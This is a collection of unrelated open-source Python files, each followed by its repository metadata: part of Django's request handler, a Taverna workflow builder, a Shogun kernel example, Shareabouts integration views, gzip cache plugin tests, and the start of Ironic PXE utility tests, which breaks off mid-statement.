urlresolvers.set_urlconf(urlconf)
resolver = urlresolvers.RegexURLResolver(r'^/', urlconf)
callback, callback_args, callback_kwargs = resolver.resolve(
request.path_info)
# Apply view middleware
for middleware_method in self._view_middleware:
response = middleware_method(request, callback, callback_args, callback_kwargs)
if response:
break
if response is None:
try:
response = callback(request, *callback_args, **callback_kwargs)
except Exception as e:
# If the view raised an exception, run it through exception
# middleware, and if the exception middleware returns a
# response, use that. Otherwise, reraise the exception.
for middleware_method in self._exception_middleware:
response = middleware_method(request, e)
if response:
break
if response is None:
raise
# Complain if the view returned None (a common error).
if response is None:
try:
view_name = callback.func_name # If it's a function
except AttributeError:
view_name = callback.__class__.__name__ + '.__call__' # If it's a class
raise ValueError("The view %s.%s didn't return an HttpResponse object." % (callback.__module__, view_name))
# If the response supports deferred rendering, apply template
# response middleware and the render the response
if hasattr(response, 'render') and callable(response.render):
for middleware_method in self._template_response_middleware:
response = middleware_method(request, response)
response = response.render()
except http.Http404 as e:
logger.warning('Not Found: %s', request.path,
extra={
'status_code': 404,
'request': request
})
if settings.DEBUG:
from django.views import debug
response = debug.technical_404_response(request, e)
else:
try:
callback, param_dict = resolver.resolve404()
response = callback(request, **param_dict)
except:
try:
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
finally:
signals.got_request_exception.send(sender=self.__class__, request=request)
except exceptions.PermissionDenied:
logger.warning(
'Forbidden (Permission denied): %s', request.path,
extra={
'status_code': 403,
'request': request
})
try:
callback, param_dict = resolver.resolve403()
response = callback(request, **param_dict)
except:
try:
response = self.handle_uncaught_exception(request,
resolver, sys.exc_info())
finally:
signals.got_request_exception.send(
sender=self.__class__, request=request)
except SystemExit:
# Allow sys.exit() to actually exit. See tickets #1023 and #4701
raise
except: # Handle everything else, including SuspiciousOperation, etc.
# Get the exception info now, in case another exception is thrown later.
signals.got_request_exception.send(sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
finally:
# Reset URLconf for this thread on the way out for complete
# isolation of request.urlconf
urlresolvers.set_urlconf(None)
try:
# Apply response middleware, regardless of the response
for middleware_method in self._response_middleware:
response = middleware_method(request, response)
response = self.apply_response_fixes(request, response)
except: # Any exception should be gathered and handled
signals.got_request_exception.send(sender=self.__class__, request=request)
response = self.handle_uncaught_exception(request, resolver, sys.exc_info())
return response
def handle_uncaught_exception(self, request, resolver, exc_info):
"""
Processing for any otherwise uncaught exceptions (those that will
generate HTTP 500 responses). Can be overridden by subclasses who want
customised 500 handling.
Be *very* careful when overriding this because the error could be
caused by anything, so assuming something like the database is always
available would be an error.
"""
from django.conf import settings
if settings.DEBUG_PROPAGATE_EXCEPTIONS:
raise
logger.error('Internal Server Error: %s', request.path,
exc_info=exc_info,
extra={
'status_code': 500,
'request': request
}
)
if settings.DEBUG:
from django.views import debug
return debug.technical_500_response(request, *exc_info)
# If Http500 handler is not installed, re-raise last exception
if resolver.urlconf_module is None:
raise exc_info[1], None, exc_info[2]
# Return an HttpResponse that displays a friendly error message.
callback, param_dict = resolver.resolve500()
return callback(request, **param_dict)
def apply_response_fixes(self, request, response):
"""
Applies each of the functions in self.response_fixes to the request and
response, modifying the response in the process. Returns the new
response.
"""
for func in self.response_fixes:
response = func(request, response)
return response
def get_script_name(environ):
"""
Returns the equivalent of the HTTP request's SCRIPT_NAME environment
variable. If Apache mod_rewrite has been used, returns what would have been
the script name prior to any rewriting (so it's the script name as seen
from the client's perspective), unless the FORCE_SCRIPT_NAME setting is
set (to anything).
"""
from django.conf import settings
if settings.FORCE_SCRIPT_NAME is not None:
return force_unicode(settings.FORCE_SCRIPT_NAME)
# If Apache's mod_rewrite had a whack at the URL, Apache set either
# SCRIPT_URL or REDIRECT_URL to the full resource URL before applying any
# rewrites. Unfortunately not every Web server (lighttpd!) passes this
# information through all the time, so FORCE_SCRIPT_NAME, above, is still
# needed.
script_url = environ.get('SCRIPT_URL', u'')
if not script_url:
script_url = environ.get('REDIRECT_URL', u'')
if script_url:
return force_unicode(script_url[:-len(environ.get('PATH_INFO', ''))])
return force_unicode(environ.get('SCRIPT_NAME', u''))
| lzw120/django | django/core/handlers/base.py | Python | bsd-3-clause | 11,893 |
# Copyright (C) 2013 Cardiff University
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
__all__ = ("Workflow",)
import uuid
from t2base import *
from t2types import T2FlowType, List
from t2annotation import Annotation
from t2activity import Activity, NestedWorkflow, TextConstant
from t2task import WorkflowTasks
from t2util import alphanumeric
from balc_version import version
def getUUID():
return uuid.uuid4()
class WorkflowPort(Port):
def __init__(self, name, type):
Port.__init__(self, name, type)
self.annotations = {}
for name in ('description', 'example'):
if type.hasAnnotation(name):
setattr(self, name, type.getAnnotation(name))
@property
def description(self):
try:
return self.annotations['net.sf.taverna.t2.annotation.annotationbeans.FreeTextDescription']
except KeyError:
raise AttributeError('description')
@description.setter
def description(self, value):
if not isinstance(value, Annotation):
value = Annotation(value)
self.annotations['net.sf.taverna.t2.annotation.annotationbeans.FreeTextDescription'] = value
@property
def example(self):
try:
return self.annotations['net.sf.taverna.t2.annotation.annotationbeans.ExampleValue']
except KeyError:
raise AttributeError('example')
@example.setter
def example(self, value):
if not isinstance(value, Annotation):
value = Annotation(value)
self.annotations['net.sf.taverna.t2.annotation.annotationbeans.ExampleValue'] = value
class WorkflowInputPort(WorkflowPort, Source):
def __init__(self, flow, name, type):
Source.__init__(self, flow)
WorkflowPort.__init__(self, name, type)
def asSourcePort(self):
return self
def getIterationDepth(self):
return 0
def link(self, other):
assert isinstance(other, Sink), other
self.flow.linkData(self, other)
def exportInputPortXML(self, xml):
with xml.namespace("http://taverna.sf.net/2008/xml/t2flow") as tav:
with tav.port as port:
port.name >> self.name
depth = self.getDepth()
port.depth >> depth
port.granularDepth >> depth
with port.annotations:
for annotationClass, annotation in self.annotations.items():
annotation.exportXML(xml, annotationClass)
def exportSourceXML(self, xml):
with xml.namespace("http://taverna.sf.net/2008/xml/t2flow") as tav:
with tav.source(type="dataflow"):
tav.port >> self.name
class WorkflowOutputPort(WorkflowPort, Sink):
def __init__(self, flow, name, type):
Sink.__init__(self, flow)
WorkflowPort.__init__(self, name, type)
def asSinkPort(self):
return self
def addIterationDepth(self, depth):
if depth > 0:
raise RuntimeError('require additional "%s" for "| %s"' % ('-' * depth, self.name))
elif depth < 0:
raise RuntimeError('too many collects')
def link(self, other):
assert isinstance(other, Source), other
self.flow.linkData(other, self)
def exportOutputPortXML(self, xml):
with xml.namespace("http://taverna.sf.net/2008/xml/t2flow") as tav:
with tav.port as port:
port.name >> self.name
with port.annotations:
for annotationClass, annotation in self.annotations.items():
annotation.exportXML(xml, annotationClass)
def exportSinkXML(self, xml):
with xml.namespace("http://taverna.sf.net/2008/xml/t2flow") as tav:
with tav.sink(type="dataflow"):
tav.port >> self.name
class WorkflowPorts(Ports):
def __getitem__(self, name):
return self.__getattr__(name)
def __setitem__(self, name, type):
return self.__setattr__(name, type)
def __setattr__(self, name, type):
# flow.input.name = type
if self._.ports.has_key(name):
raise RuntimeError('port "%s" redefined' % name)
if isinstance(type, Port):
other = type
type = other.type
elif isinstance(type, T2FlowType):
other = None
else:
raise TypeError('port "%s" must be assigned a type' % name)
port = self._.ports[name] = self._.PortClass(self._.flow, name, type)
self._.order.append(name)
if other is not None:
port.link(other)
def __getattr__(self, name):
if self._.ports.has_key(name):
return self._.ports[name] # return an existing typed port
return self(name) # return a new untyped port
class UntypedInputPort:
def __init__(self, flow, name):
self.flow = flow
self.name = name
def __or__(self, sink):
return self.flow.linkData(self, sink)
class WorkflowInputPorts(WorkflowPorts):
def __init__(self, flow):
WorkflowPorts.__init__(self, flow)
self._.PortClass = WorkflowInputPort
def __call__(self, name):
# this should be called untypedPort(), but that would pollute the
# namespace that this class represents, so we use __call__ as a hack
return UntypedInputPort(self._.flow, name)
class UntypedOutputPort:
def __init__(self, flow, name):
self.flow = flow
self.name = name
def __ror__(self, source):
return self.flow.linkData(source, self)
def __pos__(self):
return SplayDepthChange(self)
def __neg__(self):
return CollectDepthChange(self)
def __invert__(self):
return WrapDepthChange(self)
class WorkflowOutputPorts(WorkflowPorts):
def __init__(self, flow):
WorkflowPorts.__init__(self, flow)
self._.PortClass = WorkflowOutputPort
def __call__(self, name):
# this should be called untypedPort(), but that would pollute the
# namespace that this class represents, so we use __call__ as a hack
return UntypedOutputPort(self._.flow, name)
class DataLink:
def __init__(self, source, sink):
self.source = source
self.sink = sink
def exportXML(self, xml):
with xml.namespace("http://taverna.sf.net/2008/xml/t2flow") as tav:
with tav.datalink:
self.source.exportSourceXML(xml)
self.sink.exportSinkXML(xml)
def tavernaName(title):
# Taverna creates the workflow name from the title annotation's first 20 characters,
# with non-alphanumeric characters replaced by underscore
name = []
for ch in title[:20]:
if ch in alphanumeric:
name.append(ch)
else:
name.append('_')
return ''.join(name)
class Workflow(object):
def __init__(self, title="Workflow", author=None, description=None):
self.id = getUUID()
self.annotations = {}
self.dataLinks = []
self.ctrlLinks = []
self.input = WorkflowInputPorts(self)
self.output = WorkflowOutputPorts(self)
self.task = WorkflowTasks(self)
self.title = title
if author is not None:
self.author = author
if description is not None:
self.description = description
def getId(self):
return self.id
def getInputs(self):
inputs = {}
for port in self.input:
inputs[port.name] = port.type
return inputs
def getOutputs(self):
outputs = {}
for port in self.output:
outputs[port.name] = port.type
return outputs
@property
def title(self):
return self.annotations.get('net.sf.taverna.t2.annotation.annotationbeans.DescriptiveTitle')
@title.setter
def title(self, value):
if not isinstance(value, Annotation):
value = Annotation(value)
self.annotations['net.sf.taverna.t2.annotation.annotationbeans.DescriptiveTitle'] = value
self.name = tavernaName(value.text)
@property
def author(self):
return self.annotations.get('net.sf.taverna.t2.annotation.annotationbeans.Author')
@author.setter
def author(self, value):
if not isinstance(value, Annotation):
value = Annotation(value)
self.annotations['net.sf.taverna.t2.annotation.annotationbeans.Author'] = value
@property
def description(self):
return self.annotations.get('net.sf.taverna.t2.annotation.annotationbeans.FreeTextDescription')
@description.setter
def description(self, value):
if not isinstance(value, Annotation):
value = Annotation(value)
self.annotations['net.sf.taverna.t2.annotation.annotationbeans.FreeTextDescription'] = value
def isWorkbenchSafe(self):
# If this is set to False, RServe activities will use direct mapping of
# dotted names. Taverna Engine is OK with this, but Workbench cannot
# display the links or edit the component.
# If it is True, the RServe activity will add lines to the start and
# end of the script to map to Workbench-friendly names inside the script.
return True
def selectUniqueLabel(self, namespace, candidate):
i = 1
label = candidate
while label in namespace:
i += 1
label = '%s_%d' % (candidate, i)
return label
def addActivity(self, activity, candidate=None):
if candidate is None:
if activity.name is None:
candidate = activity.__class__.__name__
else:
candidate = activity.name
label = self.selectUniqueLabel(self.task, candidate)
task = self.task[label] << activity
return task
def linkData(self, source, sink):
if isinstance(source, DepthChange):
source = source.base
depthChange = 0 # the depth change indicated by the pipe
depthChangeByIteration = False
if isinstance(sink, DepthChange):
depthChange = sink.depthChange
if isinstance(sink, SplayDepthChange):
depthChange = -depthChange
depthChangeByIteration = True
elif isinstance(sink, CollectDepthChange):
depthChangeByIteration = True
sink = sink.base
if isinstance(source, basestring):
source = self.addActivity(TextConstant(source), sink.name)
elif isinstance(source, Activity):
source = self.addActivity(source)
if isinstance(sink, Activity):
sink = self.addActivity(sink)
# need to sort activities out before untyped sinks, so that type
# mapping will work
if isinstance(source, UntypedInputPort):
if isinstance(sink, UntypedOutputPort):
raise RuntimeError('cannot pipe input port to output port without declaring type')
type = sink.asSinkPort().type
if depthChange < 0:
for i in range(-depthChange):
type = List[type]
self.input[source.name] = type
source = self.input[source.name]
if isinstance(sink, UntypedOutputPort):
type = source.asSourcePort().type
if depthChange > 0:
for i in range(depthChange):
type = List[type]
self.output[sink.name] = type
sink = self.output[sink.name]
pipe = Pipeline(self, source, sink)
source = source.asSourcePort()
sink = sink.asSinkPort()
if source.type.getDepth() + depthChange != sink.type.getDepth():
raise RuntimeError('%s | %s: depths %d - %d != %d expected difference' % (source, sink, source.type.getDepth(), sink.type.getDepth(), depthChange))
validator = sink.type.validator(source.type)
if validator is not None:
task = self.addActivity(validator, 'Validate_' + source.name)
self.dataLinks.append(DataLink(source, task.asSinkPort()))
self.dataLinks.append(DataLink(task.asSourcePort(), sink))
else:
self.dataLinks.append(DataLink(source, sink))
iterationDepth = source.getIterationDepth()
if depthChangeByIteration:
iterationDepth -= depthChange
sink.addIterationDepth(iterationDepth)
return pipe
def sequenceTasks(self, task1, task2):
self.ctrlLinks.append((task1, task2))
def allDescendants(self, descendants=None):
# Create a list of all nested workflows and their nested workflows, ad infinitum
if descendants is None:
descendants = []
for task in self.task:
for activity in task.activities:
if isinstance(activity, NestedWorkflow):
flow = activity.flow
descendants.append(flow)
flow.allDescendants(descendants)
return descendants
def exportXML(self, xml):
# The uuidCache ensures that if a nested workflow is referenced more than once,
# it is only added to the file once.
uuidCache = set()
with xml.namespace("http://taverna.sf.net/2008/xml/t2flow") as tav:
with tav.workflow(version=1, producedBy=getCreator()):
self.exportXMLDataflow(xml, 'top')
for flow in self.allDescendants():
if flow.id not in uuidCache:
uuidCache.add(flow.id)
flow.exportXMLDataflow(xml, 'nested')
def exportXMLDataflow(self, xml, role):
with xml.namespace("http://taverna.sf.net/2008/xml/t2flow") as tav:
with tav.dataflow(id=self.id, role=role):
tav.name >> self.name
with tav.inputPorts:
for port in self.input:
port.exportInputPortXML(xml)
with tav.outputPorts:
for port in self.output:
port.exportOutputPortXML(xml)
with tav.processors:
for processor in self.task:
processor.exportXML(xml)
with tav.conditions:
for task1, task2 in self.ctrlLinks:
tav.condition(control=task1.name, target=task2.name)
with tav.datalinks:
for link in self.dataLinks:
link.exportXML(xml)
with tav.annotations:
for annotationClass, annotation in self.annotations.items():
annotation.exportXML(xml, annotationClass)
def getCreator():
from subprocess import check_output
import os
import traceback
gitTag = ''
try:
balcazapy_home = os.environ['BALCAZAPY_HOME']
words = check_output(["git", "show-ref", "--hash=8"], cwd=balcazapy_home).split()
gitTag = " " + words[0]
if check_output(["git", "ls-files", "-m"], cwd=balcazapy_home).strip():
gitTag += ' with local modifications'
except:
traceback.print_exc()
creator = 'Balcazapy %s%s' % (version, gitTag)
return creator
| jongiddy/balcazapy | python/balcaza/t2flow.py | Python | lgpl-2.1 | 16,002 |
#!/usr/bin/env python
traindat = '../data/fm_train_real.dat'
testdat = '../data/fm_test_real.dat'
parameter_list=[[traindat,testdat, 1.3],[traindat,testdat, 1.4]]
def kernel_gaussian_modular (train_fname=traindat,test_fname=testdat, width=1.3):
from modshogun import RealFeatures, GaussianKernel, CSVFile
feats_train=RealFeatures(CSVFile(train_fname))
feats_test=RealFeatures(CSVFile(test_fname))
kernel=GaussianKernel(feats_train, feats_train, width)
km_train=kernel.get_kernel_matrix()
kernel.init(feats_train, feats_test)
km_test=kernel.get_kernel_matrix()
return km_train,km_test,kernel
if __name__=='__main__':
print('Gaussian')
kernel_gaussian_modular(*parameter_list[0])
| AzamYahya/shogun | examples/undocumented/python_modular/kernel_gaussian_modular.py | Python | gpl-3.0 | 695 |
import json
import re
import requests
from requests.auth import HTTPBasicAuth
from django.conf import settings
from django.http import HttpResponse, Http404
from django.contrib.auth.decorators import login_required
from django.core.signing import Signer
from planbox_data.models import Project
from shareabouts_integration.models import Preauthorization
from shareabouts_integration.oauth_dance import get_auth_header, get_authorization_code, get_credentials
from raven.contrib.django.models import client
def bad_request(errors):
return HttpResponse(json.dumps(errors), status=400, content_type='application/json')
@login_required
def oauth_credentials(request):
"""
How do we correlate Planbox and Shareabouts users? Username is faulty but
easy. With normal OAuth we wouldn't have this issue because the user would
specify their own account.
But for now, there's only one user to support.
"""
host = 'https://' + settings.SHAREABOUTS_HOST
client_id = settings.SHAREABOUTS_CLIENT_ID
client_secret = settings.SHAREABOUTS_CLIENT_SECRET
# Make sure a project ID is specified
project_id = request.GET.get('project_id')
try:
project = Project.objects.all().get(pk=project_id)
except Project.DoesNotExist:
return bad_request([{'project_id': 'Project does not exist.'}])
# Make sure the user has edit permission on the project.
if not project.editable_by(request.user):
return HttpResponse('Unauthorized', status=401)
# Get the preauthorization object for the project.
try:
auth = Preauthorization.objects.get(project=project)
except Preauthorization.DoesNotExist:
raise Http404
username = auth.username
# Get the requested credentials from the Shareabouts API server
session = requests.session()
try:
auth_header = get_auth_header(client_id, client_secret, username)
authorization_code = get_authorization_code(session, host, client_id, auth_header)
credentials = get_credentials(session, host, authorization_code, client_id, client_secret)
except AssertionError:
if settings.DEBUG: raise
client.captureException()
return HttpResponse('Upstream error occurred.',
status=502,
content_type='text/plain')
return HttpResponse(json.dumps(credentials, indent=2, sort_keys=True),
status=200,
content_type='application/json')
@login_required
def create_dataset(request):
"""
Create a dataset under the account specified in the settings with the
name provided in the 'dataset_slug' query parameter.
"""
# We should only be allowed to POST to this view.
if request.method.upper() != 'POST':
return HttpResponse('Method not allowed', status=405)
# Do some simple validation on the slug. We don't allow empty slugs.
slug = request.POST.get('dataset_slug', '')
if len(slug) == 0:
return HttpResponse(
json.dumps({'errors': [{'dataset_slug': 'This field is required.'}]}),
content_type='application/json', status=400)
datasets_url = 'https://%s/api/v2/%s/datasets' % (
settings.SHAREABOUTS_HOST,
settings.SHAREABOUTS_USERNAME)
dataset_url = '/'.join([datasets_url, slug])
planbox_auth = HTTPBasicAuth(
settings.SHAREABOUTS_USERNAME,
settings.SHAREABOUTS_PASSWORD)
# Try to retrieve the dataset.
ds_response = requests.get(dataset_url, auth=planbox_auth)
# If the dataset exists already; nothing to do, since we assume that a
# CORS permission profile is already created.
if ds_response.status_code == 200:
return HttpResponse(
json.dumps({'url': ds_response.json()['url']}),
content_type='application/json')
# If the dataset was not reported as existing but we didn't get a 404 back
# then we have some error response and should send a 502 down.
elif ds_response.status_code != 404:
return HttpResponse(
json.dumps({'errors': 'Unknown upstream problem.'}),
status=502,
content_type='application/json')
# If the dataset did not exist, create it.
ds_response = requests.post(datasets_url,
data=json.dumps({'slug': slug, 'display_name': slug}),
headers={'Content-type': 'application/json'},
auth=planbox_auth)
# Check that we were successful in creating the dataset.
if ds_response.status_code == 201:
ds_url = ds_response.json()['url']
# Set CORS permissions on the dataset.
success = add_dataset_permissions(ds_url, request.META['HTTP_HOST'], planbox_auth)
if not success:
return HttpResponse(json.dumps({'errors': 'Failed to add access permissions on the dataset.'}),
status=502, content_type='application/json')
# Return the dataset URL as well as a signature that we'll use later
# when we authorize the user to access the Shareabouts API as the
# dataset's owner.
signer = Signer(salt='shareabouts')
return HttpResponse(
json.dumps({
'dataset_url': ds_url,
'signature': signer.sign(ds_url)
}),
content_type='application/json')
elif ds_response.status_code < 500:
client.captureMessage('Failed to create a dataset with Shareabouts API response %s %s' % (ds_response.status_code, ds_response.content))
return HttpResponse(ds_response.content,
status=ds_response.status_code,
content_type='application/json')
else:
client.captureMessage('Failed to create a dataset with Shareabouts API response %s %s' % (ds_response.status_code, ds_response.content))
return HttpResponse(json.dumps({'errors': 'Unknown upstream problem.'}),
status=502,
content_type='application/json')
def add_dataset_permissions(dataset_url, host, shareabouts_auth):
# Try to add CORS permissinos for the given host to access the dataset.
# Retry up to 5 times.
origins_url = dataset_url + '/origins'
retries = 5
for _ in range(retries):
origins_response = requests.post(origins_url, auth=shareabouts_auth, data={'pattern': host})
if origins_response.status_code == 201:
return True
else:
client.captureMessage('Failed to add permissions for host %s in dataset at %s: %s %s' % (host, dataset_url, origins_response.status_code, origins_response.content))
continue
return False
@login_required
def authorize_project(request):
# We should only be allowed to POST to this view.
if request.method.upper() != 'POST':
return HttpResponse('Method not allowed', status=405)
dataset_url = request.POST.get('dataset_url', '')
signature = request.POST.get('signature', '')
project_id = request.POST.get('project_id', '')
# Make sure all fields are present.
errors = []
if not dataset_url: errors.append({'dataset_url': 'This field is required.'})
if not signature: errors.append({'signature': 'This field is required.'})
if not project_id: errors.append({'project_id': 'This field is required.'})
if errors:
return bad_request(errors)
# Make sure the signature is valid.
signer = Signer(salt='shareabouts')
if signature != signer.sign(dataset_url):
return bad_request([{'signature': 'Invalid signature.'}])
# Parse out the owner username.
owner_pattern = '^https://%s/api/v2/([^/]+)/datasets' % (settings.SHAREABOUTS_HOST,)
match = re.match(owner_pattern, dataset_url)
if not match:
return bad_request([{'dataset_url': 'Could not find username.'}])
owner_username = match.group(1)
# Query for the project object.
try:
project = Project.objects.all().get(pk=project_id)
except Project.DoesNotExist:
return bad_request([{'project_id': 'Project does not exist.'}])
# Make sure the user has edit permission.
if not project.editable_by(request.user):
return HttpResponse('Unauthorized', status=401)
# Ensure that a preauthorization for the project exists.
auth, _ = Preauthorization.objects.get_or_create(project=project)
auth.username = owner_username
auth.save()
return HttpResponse('', status=204) | civiclaboratories/planbox | src/shareabouts_integration/views.py | Python | gpl-3.0 | 8,376 |
# -*- coding: utf-8 -*-
'''Core plugins unit tests'''
import os
import tempfile
import unittest
import time
from contextlib import contextmanager
from tempfile import mkdtemp
from shutil import rmtree
from hashlib import md5
import gzip_cache
@contextmanager
def temporary_folder():
"""creates a temporary folder, return it and delete it afterwards.
This allows to do something like this in tests:
>>> with temporary_folder() as d:
# do whatever you want
"""
tempdir = mkdtemp()
try:
yield tempdir
finally:
rmtree(tempdir)
class TestGzipCache(unittest.TestCase):
def test_should_compress(self):
user_exclude_types = ()
# Some filetypes should compress and others shouldn't.
self.assertTrue(gzip_cache.should_compress('foo.html', user_exclude_types))
self.assertTrue(gzip_cache.should_compress('bar.css', user_exclude_types))
self.assertTrue(gzip_cache.should_compress('baz.js', user_exclude_types))
self.assertTrue(gzip_cache.should_compress('foo.txt', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('foo.gz', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('bar.png', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('baz.mp3', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('foo.mov', user_exclude_types))
user_exclude_types = ('.html', '.xyz')
self.assertFalse(gzip_cache.should_compress('foo.html', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('bar.xyz', user_exclude_types))
self.assertFalse(gzip_cache.should_compress('foo.gz', user_exclude_types))
self.assertTrue(gzip_cache.should_compress('baz.js', user_exclude_types))
def test_should_overwrite(self):
# Default to false if GZIP_CACHE_OVERWRITE is not set
settings = { }
self.assertFalse(gzip_cache.should_overwrite(settings))
settings = { 'GZIP_CACHE_OVERWRITE': False }
self.assertFalse(gzip_cache.should_overwrite(settings))
settings = { 'GZIP_CACHE_OVERWRITE': True }
self.assertTrue(gzip_cache.should_overwrite(settings))
def test_creates_gzip_file(self):
# A file matching the input filename with a .gz extension is created.
# The plugin walks over the output content after the finalized signal
# so it is safe to assume that the file exists (otherwise walk would
# not report it). Therefore, create a dummy file to use.
with temporary_folder() as tempdir:
_, a_html_filename = tempfile.mkstemp(suffix='.html', dir=tempdir)
with open(a_html_filename, 'w') as f:
f.write('A' * 24) # under this length, compressing is useless and create_gzip_file will not create any file
gzip_cache.create_gzip_file(a_html_filename, False)
self.assertTrue(os.path.exists(a_html_filename + '.gz'))
def test_creates_same_gzip_file(self):
# Should create the same gzip file from the same contents.
# gzip will create a slightly different file because it includes
# a timestamp in the compressed file by default. This can cause
# problems for some caching strategies.
with temporary_folder() as tempdir:
_, a_html_filename = tempfile.mkstemp(suffix='.html', dir=tempdir)
with open(a_html_filename, 'w') as f:
f.write('A' * 24) # under this length, compressing is useless and create_gzip_file will not create any file
a_gz_filename = a_html_filename + '.gz'
gzip_cache.create_gzip_file(a_html_filename, False)
gzip_hash = get_md5(a_gz_filename)
time.sleep(1)
gzip_cache.create_gzip_file(a_html_filename, False)
self.assertEqual(gzip_hash, get_md5(a_gz_filename))
def test_overwrites_gzip_file(self):
# A file matching the input filename with a .gz extension is not created.
# The plugin walks over the output content after the finalized signal
# so it is safe to assume that the file exists (otherwise walk would
# not report it). Therefore, create a dummy file to use.
with temporary_folder() as tempdir:
_, a_html_filename = tempfile.mkstemp(suffix='.html', dir=tempdir)
gzip_cache.create_gzip_file(a_html_filename, True)
self.assertFalse(os.path.exists(a_html_filename + '.gz'))
def get_md5(filepath):
with open(filepath, 'rb') as fh:
return md5(fh.read()).hexdigest()
| mikitex70/pelican-plugins | gzip_cache/test_gzip_cache.py | Python | agpl-3.0 | 4,627 |
#
# Copyright 2014 Rackspace, Inc
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import mock
from oslo_config import cfg
import six
from ironic.common import pxe_utils
from ironic.conductor import task_manager
from ironic.tests.conductor import utils as mgr_utils
from ironic.tests.db import base as db_base
from ironic.tests.objects import utils as object_utils
CONF = cfg.CONF
class TestPXEUtils(db_base.DbTestCase):
def setUp(self):
super(TestPXEUtils, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake")
common_pxe_options = {
'deployment_aki_path': u'/tftpboot/1be26c0b-03f2-4d2e-ae87-'
u'c02d7f33c123/deploy_kernel',
'aki_path': u'/tftpboot/1be26c0b-03f2-4d2e-ae87-c02d7f33c123/'
u'kernel',
'pxe_append_params': 'test_param',
'deployment_ari_path': u'/tftpboot/1be26c0b-03f2-4d2e-ae87-c02d7'
u'f33c123/deploy_ramdisk',
'root_device': 'vendor=fake,size=123',
'ipa-api-url': 'http://192.168.122.184:6385',
}
self.pxe_options = {
'deployment_key': '0123456789ABCDEFGHIJKLMNOPQRSTUV',
'ari_path': u'/tftpboot/1be26c0b-03f2-4d2e-ae87-c02d7f33c123/'
u'ramdisk',
'iscsi_target_iqn': u'iqn-1be26c0b-03f2-4d2e-ae87-c02d7f33'
u'c123',
'deployment_id': u'1be26c0b-03f2-4d2e-ae87-c02d7f33c123',
'ironic_api_url': 'http://192.168.122.184:6385',
'disk': 'cciss/c0d0,sda,hda,vda',
'boot_option': 'netboot',
'ipa-driver-name': 'pxe_ssh',
}
self.pxe_options.update(common_pxe_options)
self.pxe_options_bios = {
'boot_mode': 'bios',
}
self.pxe_options_bios.update(self.pxe_options)
self.pxe_options_uefi = {
'boot_mode': 'uefi',
}
self.pxe_options_uefi.update(self.pxe_options)
self.agent_pxe_options = {
'ipa-driver-name': 'agent_ipmitool',
}
self.agent_pxe_options.update(common_pxe_options)
self.ipxe_options = self.pxe_options.copy()
self.ipxe_options.update({
'deployment_aki_path': 'http://1.2.3.4:1234/deploy_kernel',
'deployment_ari_path': 'http://1.2.3.4:1234/deploy_ramdisk',
'aki_path': 'http://1.2.3.4:1234/kernel',
'ari_path': 'http://1.2.3.4:1234/ramdisk',
})
self.node = object_utils.create_test_node(self.context)
def test__build_pxe_config(self):
rendered_template = pxe_utils._build_pxe_config(
self.pxe_options_bios, CONF.pxe.pxe_config_template,
'{{ ROOT }}', '{{ DISK_IDENTIFIER }}')
expected_template = open(
'ironic/tests/drivers/pxe_config.template').read().rstrip()
self.assertEqual(six.text_type(expected_template), rendered_template)
def test__build_pxe_config_with_agent(self):
rendered_template = pxe_utils._build_pxe_config(
self.agent_pxe_options, CONF.agent.agent_pxe_config_template,
'{{ ROOT }}', '{{ DISK_IDENTIFIER }}')
expected_template = open(
'ironic/tests/drivers/agent_pxe_config.template').read().rstrip()
self.assertEqual(six.text_type(expected_template), rendered_template)
def test__build_ipxe_config(self):
# NOTE(lucasagomes): iPXE is just an extension of the PXE driver,
# it doesn't have it's own configuration option for template.
# More info:
# http://docs.openstack.org/developer/ironic/deploy/install-guide.html
self.config(
pxe_config_template='ironic/drivers/modules/ipxe_config.template',
group='pxe'
)
self.config(http_url='http://1.2.3.4:1234', group='deploy')
rendered_template = pxe_utils._build_pxe_config(
self.ipxe_options, CONF.pxe.pxe_config_template,
'{{ ROOT }}', '{{ DISK_IDENTIFIER }}')
expected_template = open(
'ironic/tests/drivers/ipxe_config.template').read().rstrip()
self.assertEqual(six.text_type(expected_template), rendered_template)
def test__build_elilo_config(self):
pxe_opts = self.pxe_options
pxe_opts['boot_mode'] = 'uefi'
rendered_template = pxe_utils._build_pxe_config(
pxe_opts, CONF.pxe.uefi_pxe_config_template,
'{{ ROOT }}', '{{ DISK_IDENTIFIER }}')
expected_template = open(
'ironic/tests/drivers/elilo_efi_pxe_config.template'
).read().rstrip()
self.assertEqual(six.text_type(expected_template), rendered_template)
def test__build_grub_config(self):
pxe_opts = self.pxe_options
pxe_opts['boot_mode'] = 'uefi'
pxe_opts['tftp_server'] = '192.0.2.1'
grub_tmplte = "ironic/drivers/modules/pxe_grub_config.template"
rendered_template = pxe_utils._build_pxe_config(
pxe_opts, grub_tmplte, '(( ROOT ))', '(( DISK_IDENTIFIER ))')
expected_template = open(
'ironic/tests/drivers/pxe_grub_config.template').read().rstrip()
self.assertEqual(six.text_type(expected_template), rendered_template)
@mock.patch('ironic.common.utils.create_link_without_raise', autospec=True)
@mock.patch('ironic.common.utils.unlink_without_raise', autospec=True)
@mock.patch('ironic.drivers.utils.get_node_mac_addresses', autospec=True)
def test__write_mac_pxe_configs(self, get_macs_mock, unlink_mock,
create_link_mock):
macs = [
